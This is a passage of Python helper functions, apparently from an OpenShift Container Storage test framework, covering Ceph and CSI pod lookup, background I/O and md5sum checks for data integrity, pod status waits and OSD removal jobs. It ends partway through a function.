def get_csi_provisioner_pod(interface):
"""
Get the provisioner pod based on interface
Returns:
Pod object: The provisioner pod object based on iterface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
selector = (
"app=csi-rbdplugin-provisioner"
if (
interface == constants.CEPHBLOCKPOOL
or interface == constants.CEPHBLOCKPOOL_THICK
)
else "app=csi-cephfsplugin-provisioner"
)
provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name,
)
return provisioner_pod
def get_csi_snapshoter_pod():
"""
Get the csi snapshot controller pod
Returns:
Pod object: csi snapshot controller pod
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace="openshift-cluster-storage-operator"
)
selector = "app=csi-snapshot-controller"
snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
snapshotner_pod = Pod(**snapshotner_pod[0]).name
return snapshotner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name="rbd"):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns (List): List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exist, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get()
.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name, block=False):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
str: The md5sum of the file
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists"
current_md5sum = cal_md5sum(pod_obj, file_name, block)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, "Data corruption found"
logger.info(f"File {file_name} exists and md5sum matches")
return True
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f'bash -c "let i=0; while true; do echo '
f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
timeout=2400,
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20,
sleep=1,
func=check_file_existence,
pod_obj=pod_obj,
file_path=test_file,
):
if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin")
base64_output = base64.b64encode(out["key"].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get("items")
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get("items")
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
ebd_plugin_pods = [Pod(**pod) for pod in pods]
return ebd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the resources
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(
pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
"""
Get logs from a given pod
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True, if pod previous log required. False otherwise.
Returns:
str: Output from 'oc get logs <pod_name> command
"""
pod = OCP(kind=constants.POD, namespace=namespace)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get("spec").get("nodeName")
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources hasn't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj["status"]["startTime"]
ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f"Pod {pod.name} is not respinned, the age of the pod is {start_time}"
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
)
actual_node = pod_obj.get().get("spec").get("nodeName")
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node "
f"specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (str): The pod object
Returns:
str: The pvc name of a given pod_obj,
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim")
if not pvc:
raise UnavailableResourceException
return pvc.get("claimName")
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA["cluster_namespace"]
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
"""
Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
select external-snapshotter leader holder
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
leader_types = {
"provisioner": namespace,
"snapshotter": f"external-snapshotter-leader-{namespace}",
"resizer": f"external-resizer-{namespace}",
"attacher": f"external-attacher-{namespace}",
}
if interface == constants.CEPHBLOCKPOOL:
lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
elif interface == constants.CEPHFILESYSTEM:
lease_cmd = (
f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
)
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
leader = lease.get("spec").get("holderIdentity").strip()
assert leader, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader}")
ocp_obj._resource_name = leader
leader_pod = Pod(**ocp_obj.get())
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
)
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
)
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
# Ignoring pods with "app=rook-ceph-detect-version" app label
all_pod_obj = [
pod
for pod in all_pod_obj
if pod.get_labels()
and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
]
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj, state=state, timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node stucks at
# pending state. BZ 1810014 tracks it.
# Ignoring 'rook-ceph-crashcollector' pod health check as
# WA and deleting its deployment so that the pod
# disappears. Will revert this WA once the BZ is fixed
if "rook-ceph-crashcollector" in pod_obj.name:
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
pod_name = pod_obj.name
deployment_name = "-".join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA["cluster_namespace"]
pod = OCP(
kind=constants.POD,
namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split("=")
while True:
pod_count = 0
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: " f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}." f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with osd pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get("name")
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get("items")
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name"))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get("name")
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"]
try:
for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [
pod.status() in status_options for pod in new_osd_pods
]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
):
"""
checks whether all the pods in a given namespace are in Running state or not
Args:
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
if pod_names:
list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error)
else:
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if (
("rook-ceph-osd-prepare" not in p.name)
and ("rook-ceph-drain-canary" not in p.name)
and ("debug" not in p.name)
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if status not in "Running":
logging.error(
f"The pod {p.name} is in {status} state. Expected = Running"
)
ret_val = False
return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Checks the running state pods in a given namespace.
Returns:
List: all the pod objects that are in running state only
"""
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
running_pods_object = list()
for pod in list_of_pods:
status = ocp_pod_obj.get_resource(pod.name, "STATUS")
if "Running" in status:
running_pods_object.append(pod)
return running_pods_object
def wait_for_pods_to_be_running(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
timeout=200,
sleep=10,
):
"""
Wait for all the pods in a specific namespace to be running.
Args:
namespace (str): the namespace ot the pods
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception(in the function
'check_pods_in_running_state'), if one of the pods in the pod names are not found.
If False, it ignores the case of pod not found and returns the pod objects of
the rest of the pod names. The default value is False
timeout (int): time to wait for pods to be running
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if all pods in Running state. False, otherwise
"""
try:
for pods_running in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=check_pods_in_running_state,
namespace=namespace,
pod_names=pod_names,
raise_pod_not_found_error=raise_pod_not_found_error,
):
# Check if all the pods in running state
if pods_running:
logging.info("All the pods reached status running!")
return True
except TimeoutExpiredError:
logging.warning(
f"Not all the pods reached status running " f"after {timeout} seconds"
)
return False
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
The function returns the list of nodes for the given selector
Args:
selector (str): The resource selector to search with
Returns:
list: a list of nodes that runs the given selector pods
"""
pod_obj_list = get_all_pods(namespace=namespace, selector=[selector])
pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list]
logger.info(f"{selector} running on nodes {pods_running_nodes}")
return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
"""
Get the osd removal pod name
Args:
osd_id (int): The osd's id to get the osd removal pod name
timeout (int): The time to wait for getting the osd removal pod name
Returns:
str: The osd removal pod name
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) == Version.coerce("4.7"):
pattern = "ocs-osd-removal-job"
elif Version.coerce(ocs_version) == Version.coerce("4.8"):
pattern = "ocs-osd-removal-"
else:
pattern = f"ocs-osd-removal-{osd_id}"
try:
for osd_removal_pod_names in TimeoutSampler(
timeout=timeout,
sleep=5,
func=get_pod_name_by_pattern,
pattern=pattern,
):
if osd_removal_pod_names:
osd_removal_pod_name = osd_removal_pod_names[0]
logging.info(f"Found pod {osd_removal_pod_name}")
return osd_removal_pod_name
except TimeoutExpiredError:
logger.warning(f"Failed to get pod by the pattern {pattern}")
return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
"""
Function to check toleration on pods
Args:
toleration_key (str): The toleration key to check
"""
pod_objs = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
selector=[constants.TOOL_APP_LABEL],
exclude_selector=True,
)
flag = False
for pod_obj in pod_objs:
resource_name = pod_obj.name
tolerations = pod_obj.get().get("spec").get("tolerations")
for key in tolerations:
if key["key"] == toleration_key:
flag = True
if flag:
logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
else:
logger.error(
f"The pod {resource_name} does not have toleration {toleration_key}"
)
def run_osd_removal_job(osd_ids=None):
"""
Run the ocs-osd-removal job
Args:
osd_ids (list): The osd IDs.
Returns:
ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
"""
osd_ids_str = ",".join(map(str, osd_ids))
ocp_version = get_ocp_version()
if Version.coerce(ocp_version) >= Version.coerce("4.6"):
cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml"
else:
cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml"
